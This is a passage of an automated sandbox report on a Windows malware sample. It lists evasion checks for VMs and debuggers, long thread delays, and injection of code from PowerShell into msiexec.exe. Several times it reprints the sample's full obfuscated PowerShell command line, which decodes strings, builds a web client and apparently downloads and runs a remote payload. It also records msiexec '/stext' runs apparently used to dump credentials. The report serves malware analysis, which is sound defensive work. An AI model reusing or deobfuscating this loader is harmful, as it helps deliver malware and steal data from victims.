Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6261 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3653 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1447 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8312 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 9.1 %
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1816 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2028 Thread sleep count: 177 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2028 Thread sleep time: -531000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2028 Thread sleep count: 9806 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2028 Thread sleep time: -29418000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 8_2_1FC710F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW, 10_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 12_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407898
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00418981 memset,GetSystemInfo, 10_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWALOT
Source: powershell.exe, 00000001.00000002.1914587566.00000112FE560000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhv9E46.tmp.10.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: powershell.exe, 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2039511100.00000000057BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QEMu?
Source: wscript.exe, 00000000.00000002.1741242627.0000029266129000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\erSmar
Source: wscript.exe, 00000000.00000003.1739959471.0000029266130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: terfacevmicheartbeatHyper-V Data Exchange Service
Source: bhv9E46.tmp.10.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_044696F9 LdrInitializeThunk, 3_2_044696F9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_1FC72639
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 10_2_004044A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC74AB4 mov eax, dword ptr fs:[00000030h] 8_2_1FC74AB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC7724E GetProcessHeap, 8_2_1FC7724E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_1FC72B1C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_1FC72639
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_1FC760E2

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: Yara match File source: amsi64_4948.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2060, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3B90000 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bbodmcpjtkxucbcyfoug" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#slagtstavles talepdagogs regnskabsafdelings wardwomen yokeage #>;$ganespalter144='triumferne';<#whirler kjepladser fllesmngde #>;$gader=$adawe+$host.ui;if ($gader) {$fuglearter++;}function drunkometer($microfibril){$reflation=$elektromotoren+$microfibril.'length'-$fuglearter; for( $apoplastogamous=3;$apoplastogamous -lt $reflation;$apoplastogamous+=4){$wettability='compotation';$forbrugermotiveringer223+=$microfibril[$apoplastogamous];$dimetient='rememberers';}$forbrugermotiveringer223;}function fusionsdokumentet($achlorhydria){ &($companioning) ($achlorhydria);}$malie=drunkometer 'smam unospuz kaiprolplal ssao,s/ste5dep. la0rep sca( rwb,uid.mnresdvekofa wc ms ud bifnfretroi kog1bes0apo.cal0sip;fir ew b.ip rnsto6pro4 at; ni abexca.6ma 4 ct;ite gulrsu,vsev:kos1 la2s.l1 gr.the0ged)udk subgbone docbl kg,loste/pre2pon0mat1 un0reh0f.r1emb0dod1dyp brefhypicharsnae spf amo r xpla/ha.1 u2h t1goi.run0d,r ';$partitioned=drunkometer 'domuou,su tenonr el-cocagergedderhont gtind ';$konkursbehandlingens=drunkometer 'dephdatt.lmtpispc u:in /cli/ jee stq p u c iinspbud4 k .ti.sanahgelotheppon/chif unvavlmnymv modeelpovefslug,ra/extasaften oholltroswov.civrastap.armer ';$afspadseringspenge=drunkometer 's,a>dif ';$companioning=drunkometer ' ui brec.xxmik ';$congressist='banditter';$flunkeyhood='\plasmagel.ref';fusionsdokumentet (drunkometer ' r $,drgis l ooga bex aseklatt:tr,ilrermumrsvvispagantaskybacalencyepa=la,$s,ve b ncanvr a:renast phigpsupd boa sstfika f+rin$mulfphelsugu,ernsenksaletesy ophc looveobe.dbrn ');fusionsdokumentet (drunkometer 'bip$hypg t lkroomarbta a.shlbas:vanb ndar.cd ale rifpleo tjrs lms oaspra cal r e m t,ri=unf$tr k noonoun ftkmisukrirp,dslasbfore skhintano nsafd,ecl.ugi n nblag h.e,einsp s su.thescolplamlmaair,itrib( fo$ chaco f plsud.ppuparesdae s lyeuptrb lib kn sog ,dsbispngteud.n c g,niepsa) ac ');fusionsdokumentet (drunkometer 'tio[chinu ie vetifr.salselee unr favaulih lcst.equapsenorapiba,na etk lm kra a.n beabiogrege imrbyl]sam:re : tys iecopcleougrur gaiendtheay appaf.runrofuttparo cocspao rolsp u.v=jor on[torndukeetat o.no.s .oe b.cariu a,rpomi antl,eylftpurorproophitmalolntc dio orlrumt udyalap vaes r]ani: on:ordtpauldatsaba1bld2dis ');$konkursbehandlingens=$badeformaalet[0];$tilkendegivelsers=(drunkometer 'ma $te.g,ynlwhoore,bunsak slpse: rehaddi.ndlnoniplu=ufonalke ,ewmas-udloviob urjsniebeacdistelf op sb sytahsseetklae ivmi,o. alnbefeobjtsne. unwbagesukbgaucsuplseeixl e knnsogtrjs ');fusionsdokumentet ($tilkendegivelsers);fusionsdokumentet (drunkometer ' ac$demh sli smlbefi ph.pinhr ieun aorddfodekarruresspe[ am$ urpangai.dr matfatig nttiliumbom snproepurdt,t]upp=kla$segmtamapoll oriaf efot ');$daddocky=drunkometer ' pu$la hte,i valdipip,l.bygddoroe,awb dnparlmesopo atapdenufe,hitrnl moegri(dat$monkcosougjnsqukabsu vargifsdrubuncea.kh aaforn t ds,mllitidisnsuhghile ednsi somb,don$gelb ataudvje
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#slagtstavles talepdagogs regnskabsafdelings wardwomen yokeage #>;$ganespalter144='triumferne';<#whirler kjepladser fllesmngde #>;$gader=$adawe+$host.ui;if ($gader) {$fuglearter++;}function drunkometer($microfibril){$reflation=$elektromotoren+$microfibril.'length'-$fuglearter; for( $apoplastogamous=3;$apoplastogamous -lt $reflation;$apoplastogamous+=4){$wettability='compotation';$forbrugermotiveringer223+=$microfibril[$apoplastogamous];$dimetient='rememberers';}$forbrugermotiveringer223;}function fusionsdokumentet($achlorhydria){ &($companioning) ($achlorhydria);}$malie=drunkometer 'smam unospuz kaiprolplal ssao,s/ste5dep. la0rep sca( rwb,uid.mnresdvekofa wc ms ud bifnfretroi kog1bes0apo.cal0sip;fir ew b.ip rnsto6pro4 at; ni abexca.6ma 4 ct;ite gulrsu,vsev:kos1 la2s.l1 gr.the0ged)udk subgbone docbl kg,loste/pre2pon0mat1 un0reh0f.r1emb0dod1dyp brefhypicharsnae spf amo r xpla/ha.1 u2h t1goi.run0d,r ';$partitioned=drunkometer 'domuou,su tenonr el-cocagergedderhont gtind ';$konkursbehandlingens=drunkometer 'dephdatt.lmtpispc u:in /cli/ jee stq p u c iinspbud4 k .ti.sanahgelotheppon/chif unvavlmnymv modeelpovefslug,ra/extasaften oholltroswov.civrastap.armer ';$afspadseringspenge=drunkometer 's,a>dif ';$companioning=drunkometer ' ui brec.xxmik ';$congressist='banditter';$flunkeyhood='\plasmagel.ref';fusionsdokumentet (drunkometer ' r $,drgis l ooga bex aseklatt:tr,ilrermumrsvvispagantaskybacalencyepa=la,$s,ve b ncanvr a:renast phigpsupd boa sstfika f+rin$mulfphelsugu,ernsenksaletesy ophc looveobe.dbrn ');fusionsdokumentet (drunkometer 'bip$hypg t lkroomarbta a.shlbas:vanb ndar.cd ale rifpleo tjrs lms oaspra cal r e m t,ri=unf$tr k noonoun ftkmisukrirp,dslasbfore skhintano nsafd,ecl.ugi n nblag h.e,einsp s su.thescolplamlmaair,itrib( fo$ chaco f plsud.ppuparesdae s lyeuptrb lib kn sog ,dsbispngteud.n c g,niepsa) ac ');fusionsdokumentet (drunkometer 'tio[chinu ie vetifr.salselee unr favaulih lcst.equapsenorapiba,na etk lm kra a.n beabiogrege imrbyl]sam:re : tys iecopcleougrur gaiendtheay appaf.runrofuttparo cocspao rolsp u.v=jor on[torndukeetat o.no.s .oe b.cariu a,rpomi antl,eylftpurorproophitmalolntc dio orlrumt udyalap vaes r]ani: on:ordtpauldatsaba1bld2dis ');$konkursbehandlingens=$badeformaalet[0];$tilkendegivelsers=(drunkometer 'ma $te.g,ynlwhoore,bunsak slpse: rehaddi.ndlnoniplu=ufonalke ,ewmas-udloviob urjsniebeacdistelf op sb sytahsseetklae ivmi,o. alnbefeobjtsne. unwbagesukbgaucsuplseeixl e knnsogtrjs ');fusionsdokumentet ($tilkendegivelsers);fusionsdokumentet (drunkometer ' ac$demh sli smlbefi ph.pinhr ieun aorddfodekarruresspe[ am$ urpangai.dr matfatig nttiliumbom snproepurdt,t]upp=kla$segmtamapoll oriaf efot ');$daddocky=drunkometer ' pu$la hte,i valdipip,l.bygddoroe,awb dnparlmesopo atapdenufe,hitrnl moegri(dat$monkcosougjnsqukabsu vargifsdrubuncea.kh aaforn t ds,mllitidisnsuhghile ednsi somb,don$gelb ataudvje
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#slagtstavles talepdagogs regnskabsafdelings wardwomen yokeage #>;$ganespalter144='triumferne';<#whirler kjepladser fllesmngde #>;$gader=$adawe+$host.ui;if ($gader) {$fuglearter++;}function drunkometer($microfibril){$reflation=$elektromotoren+$microfibril.'length'-$fuglearter; for( $apoplastogamous=3;$apoplastogamous -lt $reflation;$apoplastogamous+=4){$wettability='compotation';$forbrugermotiveringer223+=$microfibril[$apoplastogamous];$dimetient='rememberers';}$forbrugermotiveringer223;}function fusionsdokumentet($achlorhydria){ &($companioning) ($achlorhydria);}$malie=drunkometer 'smam unospuz kaiprolplal ssao,s/ste5dep. la0rep sca( rwb,uid.mnresdvekofa wc ms ud bifnfretroi kog1bes0apo.cal0sip;fir ew b.ip rnsto6pro4 at; ni abexca.6ma 4 ct;ite gulrsu,vsev:kos1 la2s.l1 gr.the0ged)udk subgbone docbl kg,loste/pre2pon0mat1 un0reh0f.r1emb0dod1dyp brefhypicharsnae spf amo r xpla/ha.1 u2h t1goi.run0d,r ';$partitioned=drunkometer 'domuou,su tenonr el-cocagergedderhont gtind ';$konkursbehandlingens=drunkometer 'dephdatt.lmtpispc u:in /cli/ jee stq p u c iinspbud4 k .ti.sanahgelotheppon/chif unvavlmnymv modeelpovefslug,ra/extasaften oholltroswov.civrastap.armer ';$afspadseringspenge=drunkometer 's,a>dif ';$companioning=drunkometer ' ui brec.xxmik ';$congressist='banditter';$flunkeyhood='\plasmagel.ref';fusionsdokumentet (drunkometer ' r $,drgis l ooga bex aseklatt:tr,ilrermumrsvvispagantaskybacalencyepa=la,$s,ve b ncanvr a:renast phigpsupd boa sstfika f+rin$mulfphelsugu,ernsenksaletesy ophc looveobe.dbrn ');fusionsdokumentet (drunkometer 'bip$hypg t lkroomarbta a.shlbas:vanb ndar.cd ale rifpleo tjrs lms oaspra cal r e m t,ri=unf$tr k noonoun ftkmisukrirp,dslasbfore skhintano nsafd,ecl.ugi n nblag h.e,einsp s su.thescolplamlmaair,itrib( fo$ chaco f plsud.ppuparesdae s lyeuptrb lib kn sog ,dsbispngteud.n c g,niepsa) ac ');fusionsdokumentet (drunkometer 'tio[chinu ie vetifr.salselee unr favaulih lcst.equapsenorapiba,na etk lm kra a.n beabiogrege imrbyl]sam:re : tys iecopcleougrur gaiendtheay appaf.runrofuttparo cocspao rolsp u.v=jor on[torndukeetat o.no.s .oe b.cariu a,rpomi antl,eylftpurorproophitmalolntc dio orlrumt udyalap vaes r]ani: on:ordtpauldatsaba1bld2dis ');$konkursbehandlingens=$badeformaalet[0];$tilkendegivelsers=(drunkometer 'ma $te.g,ynlwhoore,bunsak slpse: rehaddi.ndlnoniplu=ufonalke ,ewmas-udloviob urjsniebeacdistelf op sb sytahsseetklae ivmi,o. alnbefeobjtsne. unwbagesukbgaucsuplseeixl e knnsogtrjs ');fusionsdokumentet ($tilkendegivelsers);fusionsdokumentet (drunkometer ' ac$demh sli smlbefi ph.pinhr ieun aorddfodekarruresspe[ am$ urpangai.dr matfatig nttiliumbom snproepurdt,t]upp=kla$segmtamapoll oriaf efot ');$daddocky=drunkometer ' pu$la hte,i valdipip,l.bygddoroe,awb dnparlmesopo atapdenufe,hitrnl moegri(dat$monkcosougjnsqukabsu vargifsdrubuncea.kh aaforn t ds,mllitidisnsuhghile ednsi somb,don$gelb ataudvje Jump to behavior
Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager'
Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager"
Source: msiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.0000000000699000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC72933 cpuid 8_2_1FC72933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
